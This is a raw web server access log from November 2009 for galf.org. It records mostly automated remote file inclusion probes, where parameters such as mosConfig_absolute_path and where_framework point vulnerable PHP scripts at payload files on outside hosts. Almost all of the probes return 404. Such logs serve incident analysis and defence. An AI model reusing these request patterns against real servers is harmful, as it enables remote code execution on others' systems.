157.100.230.82 - - [22/Nov/2009:20:23:44 -0800] "GET /logs///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:20:23:44 -0800] "GET //class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:20:23:44 -0800] "GET /logs/access_090504.log%20%20///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [22/Nov/2009:20:24:01 -0800] "GET /logs/access_091102.log/main.php?appserv_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [22/Nov/2009:20:24:14 -0800] "GET /logs/access.log/main.php?appserv_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
204.15.230.189 - - [22/Nov/2009:20:24:14 -0800] "GET /main.php?appserv_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
204.15.230.189 - - [22/Nov/2009:20:24:14 -0800] "GET /logs/main.php?appserv_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
157.100.230.82 - - [22/Nov/2009:20:24:21 -0800] "GET /logs/access_091019.log%20%20///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:25:44 -0800] "GET /logs///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:25:44 -0800] "GET //class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:25:44 -0800] "GET /logs/access_090504.log%20%20///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:25:54 -0800] "GET /logs///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:25:54 -0800] "GET /logs/access_090504.log%20%20///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:25:55 -0800] "GET //class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.139.67.116 - - [22/Nov/2009:20:26:18 -0800] "GET /logs/access_090713.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [22/Nov/2009:20:26:18 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [22/Nov/2009:20:26:18 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:26:32 -0800] "GET /logs/access_091019.log%20%20///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:26:45 -0800] "GET /logs/access_091019.log%20%20///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.122 - - [22/Nov/2009:20:30:08 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:32:19 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:32:19 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:32:23 -0800] "GET /logs/access_090504.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:32:29 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:32:29 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:32:31 -0800] "GET /logs/access_090504.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:20:34:43 -0800] "GET /setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.15.75 - - [22/Nov/2009:20:34:44 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.15.75 - - [22/Nov/2009:20:34:44 -0800] "GET /logs//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:20:35:42 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:20:35:42 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:20:35:42 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:20:35:51 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:20:35:51 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:20:35:51 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [22/Nov/2009:20:35:54 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:35:54 -0800] "GET /logs/access_090504.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:35:54 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:36:00 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:36:00 -0800] "GET /logs/access_090504.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:36:00 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.62.136.226 - - [22/Nov/2009:20:36:11 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.62.136.226 - - [22/Nov/2009:20:36:11 -0800] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.62.136.226 - - [22/Nov/2009:20:36:11 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:36:13 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:36:13 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:36:13 -0800] "GET /logs/access_090504.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:36:28 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:36:28 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:20:36:28 -0800] "GET /logs/access_090504.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:20:36:31 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:20:36:31 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:20:36:31 -0800] "GET /logs/access_091102.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.62.136.226 - - [22/Nov/2009:20:36:46 -0800] "GET /logs/access_090608.log//include/bbs.lib.inc.php?site_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:20:36:53 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:20:36:53 -0800] "GET /logs/access_091102.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:20:36:53 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:20:38:24 -0800] "GET /logs/access_091019.log///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:20:38:36 -0800] "GET /logs/access_090504.log///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:41:27 -0800] "GET /logs/access_090504.log///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:14 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:14 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:14 -0800] "GET /logs/access_090309.log///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:15 -0800] "GET /logs/access_090309.log///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:15 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:15 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:32 -0800] "GET /logs/access_090803.log///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:33 -0800] "GET /logs/access_090803.log///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:39 -0800] "GET /logs/access_090309.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:39 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:39 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:39 -0800] "GET /logs/access_090803.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:39 -0800] "GET /logs/access_090803.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:39 -0800] "GET /logs/access_090309.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:40 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:20:42:40 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:20:43:37 -0800] "GET /logs/access_090525.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:20:44:00 -0800] "GET /logs/access_090525.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:44:47 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:44:48 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:44:48 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:45:03 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:45:03 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:45:03 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:45:10 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:45:10 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:45:10 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:45:14 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:45:14 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:45:14 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:46:34 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:46:34 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:46:36 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:46:44 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:46:44 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:46:44 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:47:13 -0800] "GET /logs/access_091019.log///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:47:55 -0800] "GET /logs/access_090504.log///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:48:20 -0800] "GET /logs/access_091102.log///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:49:45 -0800] "GET /logs/access_090608.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:50:01 -0800] "GET /logs/access_090608.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:50:19 -0800] "GET /logs/access_090706.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:50:19 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:50:20 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:50:29 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:50:29 -0800] "GET /logs/access_090706.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:50:29 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:20:50:32 -0800] "GET /logs/access_091019.log///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:50:48 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:20:51:00 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
